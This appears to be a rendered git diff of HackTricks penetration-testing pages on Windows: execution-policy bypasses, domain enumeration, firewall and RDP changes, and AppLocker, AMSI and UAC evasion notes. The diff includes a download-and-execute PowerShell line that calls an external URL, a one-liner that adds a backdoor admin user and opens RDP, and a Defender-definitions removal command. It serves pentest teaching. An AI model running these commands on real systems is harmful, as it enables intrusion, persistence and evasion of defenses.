||||
|
@ -187,6 +192,32 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
|
|||
|
||||
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
|
||||
|
||||
## PS Execution Policy
|
||||
|
||||
By default it is set to **restricted.** Main ways to bypass this policy:
|
||||
|
||||
```powershell
|
||||
1º Just copy and paste inside the interactive PS console
|
||||
2º Read en Exec
|
||||
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
|
||||
3º Read and Exec
|
||||
Get-Content .runme.ps1 | Invoke-Expression
|
||||
4º Use other execution policy
|
||||
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
|
||||
5º Change users execution policy
|
||||
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
|
||||
6º Change execution policy for this session
|
||||
Set-ExecutionPolicy Bypass -Scope Process
|
||||
7º Download and execute:
|
||||
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
|
||||
8º Use command switch
|
||||
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
|
||||
9º Use EncodeCommand
|
||||
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
|
||||
```
|
||||
|
||||
More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
|
||||
|
||||
## Security Support Provider Interface (SSPI)
|
||||
|
||||
Is the API that can be use to authenticate users.
|
||||
|
|
|
@ -20,8 +20,13 @@
|
|||
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
|
||||
systeminfo
|
||||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
|
||||
wmic computersystem LIST full #Get PC info
|
||||
|
||||
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
|
||||
wmic qfe list brief #Updates
|
||||
|
||||
hostname
|
||||
|
||||
DRIVERQUERY #3rd party driver vulnerable?
|
||||
```
|
||||
|
||||
|
@ -54,14 +59,7 @@ nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
|
|||
wmic logicaldisk get caption,description,providername
|
||||
```
|
||||
|
||||
### AV
|
||||
|
||||
```bash
|
||||
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
|
||||
sc query windefend
|
||||
#Delete all rules of Defender (useful for machines without internet access)
|
||||
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
```
|
||||
### [Defender](authentication-credentials-uac-and-efs.md#defender)
|
||||
|
||||
### Recycle Bin
|
||||
|
||||
|
@ -88,23 +86,48 @@ reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
|
|||
## Domain info
|
||||
|
||||
```bash
|
||||
# Generic AD info
|
||||
echo %USERDOMAIN% #Get domain name
|
||||
echo %USERDNSDOMAIN% #Get domain name
|
||||
echo %logonserver% #Get name of the domain controller
|
||||
set logonserver #Get name of the domain controller
|
||||
set log #Get name of the domain controller
|
||||
net groups /domain #List of domain groups
|
||||
net group "domain computers" /domain #List of PCs connected to the domain
|
||||
net view /domain #Lis of PCs of the domain
|
||||
nltest /dclist:<DOMAIN> #List domain controllers
|
||||
net group "Domain Controllers" /domain #List PC accounts of domains controllers
|
||||
net group "Domain Admins" /domain #List users with domain admin privileges
|
||||
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
|
||||
gpresult /V # Get current policy applied
|
||||
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
|
||||
|
||||
# Users
|
||||
dsquery user #Get all users
|
||||
net user /domain #List all users of the domain
|
||||
net user <ACCOUNT_NAME> /domain #Get information about that user
|
||||
net accounts /domain #Password and lockout policy
|
||||
nltest /domain_trust #Mapping of the trust relationships.
|
||||
gpresult /V # Get current policy applied
|
||||
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
|
||||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
|
||||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
|
||||
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
|
||||
|
||||
# Groups
|
||||
net group /domain #List of domain groups
|
||||
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
|
||||
net group "Domain Admins" /domain #List users with domain admin privileges
|
||||
net group "domain computers" /domain #List of PCs connected to the domain
|
||||
net group "Domain Controllers" /domain #List PC accounts of domains controllers
|
||||
wmic group list /format:list # Information about all local groups
|
||||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
|
||||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
|
||||
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
|
||||
|
||||
# Computers
|
||||
dsquery computer #Get all computers
|
||||
net view /domain #Lis of PCs of the domain
|
||||
nltest /dclist:<DOMAIN> #List domain controllers
|
||||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
|
||||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
|
||||
|
||||
# Trust relations
|
||||
nltest /domain_trust #Mapping of the trust relationships
|
||||
|
||||
# Get all objects inside an OU
|
||||
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
|
||||
```
|
||||
|
||||
### Logs & Events
|
||||
|
@ -119,15 +142,21 @@ wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654
|
|||
### Users
|
||||
|
||||
```bash
|
||||
#Me
|
||||
whoami /all #All info about me, take a look at the enabled tokens
|
||||
whoami /priv #Show only privileges
|
||||
|
||||
# Local users
|
||||
net users #All users
|
||||
dir /b /ad "C:\Users"
|
||||
net user %username% #Info about a user (me)
|
||||
net accounts #Information about password requirements
|
||||
qwinsta #Anyone else logged in?
|
||||
wmic USERACCOUNT Get Domain,Name,Sid
|
||||
net user /add [username] [password] #Create user
|
||||
|
||||
# Other users looged
|
||||
qwinsta #Anyone else logged in?
|
||||
|
||||
#Lauch new cmd.exe with new creds (to impersonate in network)
|
||||
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
||||
|
||||
|
@ -212,23 +241,28 @@ NetSh Advfirewall set allprofiles state off #Turn Off
|
|||
NetSh Advfirewall set allprofiles state on #Trun On
|
||||
netsh firewall set opmode disable #Turn Off
|
||||
|
||||
::How to open ports
|
||||
#How to open ports
|
||||
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
|
||||
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
|
||||
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
||||
|
||||
::Enable Remote Desktop
|
||||
#Enable Remote Desktop
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
||||
::netsh firewall set service remotedesktop enable #I found that this line is not needed
|
||||
::sc config TermService start= auto #I found that this line is not needed
|
||||
::net start Termservice #I found that this line is not needed
|
||||
|
||||
::Enable Remote assistance:
|
||||
#Enable Remote Desktop with wmic
|
||||
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
|
||||
##or
|
||||
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
|
||||
|
||||
#Enable Remote assistance:
|
||||
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
|
||||
netsh firewall set service remoteadmin enable
|
||||
|
||||
::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
|
||||
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
|
||||
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
|
||||
|
||||
::Connect to RDP (using hash or password)
|
||||
|
|
|
@ -95,31 +95,7 @@ kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8
|
|||
PS> powershell -EncodedCommand <Base64>
|
||||
```
|
||||
|
||||
## Execution Policy
|
||||
|
||||
By default it is set to **restricted.** Main ways to bypass this policy:
|
||||
|
||||
```powershell
|
||||
1º Just copy and paste inside the interactive PS console
|
||||
2º Read en Exec
|
||||
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
|
||||
3º Read and Exec
|
||||
Get-Content .runme.ps1 | Invoke-Expression
|
||||
4º Use other execution policy
|
||||
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
|
||||
5º Change users execution policy
|
||||
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
|
||||
6º Change execution policy for this session
|
||||
Set-ExecutionPolicy Bypass -Scope Process
|
||||
7º Download and execute:
|
||||
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
|
||||
8º Use command switch
|
||||
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
|
||||
9º Use EncodeCommand
|
||||
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
|
||||
```
|
||||
|
||||
More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
|
||||
## [Execution Policy](../authentication-credentials-uac-and-efs.md#ps-execution-policy)
|
||||
|
||||
## [Constrained language](broken-reference)
|
||||
|
||||
|
@ -173,7 +149,7 @@ ValueData : 0
|
|||
|
||||
### AMSI bypass
|
||||
|
||||
\*\* `amsi.dll`\*\* is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything.
|
||||
 ** `amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything.
|
||||
|
||||
Therefore, the goal of the AMSI bypasses you will are are to **overwrite the instructions of that DLL in memory to make the detection useless**.
|
||||
|
||||
|
|
|
@ -40,14 +40,6 @@
|
|||
[integrity-levels.md](integrity-levels.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Windows Security Controls
|
||||
|
||||
There are different things in Windows that could **prevent you from enumerating the system**, run executables or even **detect your activities**. You should **read** the following **page** and **enumerate** all these **defenses** **mechanisms** before starting the privilege escalation enumeration:
|
||||
|
||||
{% content-ref url="../authentication-credentials-uac-and-efs.md" %}
|
||||
[authentication-credentials-uac-and-efs.md](../authentication-credentials-uac-and-efs.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## System Info
|
||||
|
||||
### Version info enumeration
|
||||
|
@ -355,6 +347,54 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
|
|||
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
|
||||
```
|
||||
|
||||
### AV
|
||||
|
||||
Check is there is any anti virus running:
|
||||
|
||||
```bash
|
||||
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
|
||||
Get-MpComputerStatus
|
||||
```
|
||||
|
||||
### AppLocker Policy
|
||||
|
||||
Check which files/extensions are blacklisted/whitelisted.
|
||||
|
||||
```powershell
|
||||
Get-ApplockerPolicy -Effective -xml
|
||||
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
$a = Get-ApplockerPolicy -effective
|
||||
$a.rulecollections
|
||||
```
|
||||
|
||||
AppLocker rules applied to a host can also be read from the local registry at `HKLM\Software\Policies\Microsoft\Windows\SrpV2`.
|
||||
|
||||
**Useful Writable folders to bypass AppLocker Policy**
|
||||
|
||||
```
|
||||
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||
C:\Windows\System32\spool\drivers\color
|
||||
C:\Windows\Tasks
|
||||
C:\windows\tracing
|
||||
```
|
||||
|
||||
Commonly trusted [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
|
||||
|
||||
**Poorly written rules could also be bypassed**, like `<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`, you can create a folder called allowed anywhere and it will be allowed.
|
||||
|
||||
**DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using DLLs as backdoors will help bypassing AppLocker.
|
||||
|
||||
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
|
||||
|
||||
### UAC
|
||||
|
||||
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\
|
||||
[**More information about UAC here**](../authentication-credentials-uac-and-efs.md#uac).
|
||||
|
||||
```
|
||||
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
|
||||
```
|
||||
|
||||
## Users & Groups
|
||||
|
||||
### Enumerate Users & Groups
|
||||
|
@ -1431,17 +1471,7 @@ while($true)
|
|||
|
||||
## From Administrator Medium to High Integrity Level / UAC Bypass
|
||||
|
||||
Read this to **learn about Integrity Levels**:
|
||||
|
||||
{% content-ref url="integrity-levels.md" %}
|
||||
[integrity-levels.md](integrity-levels.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Then **read this to learn about UAC and UAC bypasses:**
|
||||
|
||||
{% content-ref url="../windows-security-controls/uac-user-account-control.md" %}
|
||||
[uac-user-account-control.md](../windows-security-controls/uac-user-account-control.md)
|
||||
{% endcontent-ref %}
|
||||
[**Read this to learn about Integrity Levels**](integrity-levels.md) **and** [**this to learn what is UAC**](../authentication-credentials-uac-and-efs.md#uac)**, then read how to**[ **bypass it**](../authentication-credentials-uac-and-efs.md#uac)**.**
|
||||
|
||||
## **From High Integrity to System**
|
||||
|
||||
|
|
|
@ -4,19 +4,25 @@
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">
|
||||
|
||||
If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||
|
||||
{% embed url="https://www.stmcyber.com/careers" %}
|
||||
{% endhint %}
|
||||
|
||||
## Definition
|
||||
|
||||
|
@ -217,20 +223,26 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser
|
|||
}
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">
|
||||
|
||||
If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||
|
||||
{% embed url="https://www.stmcyber.com/careers" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in a new issue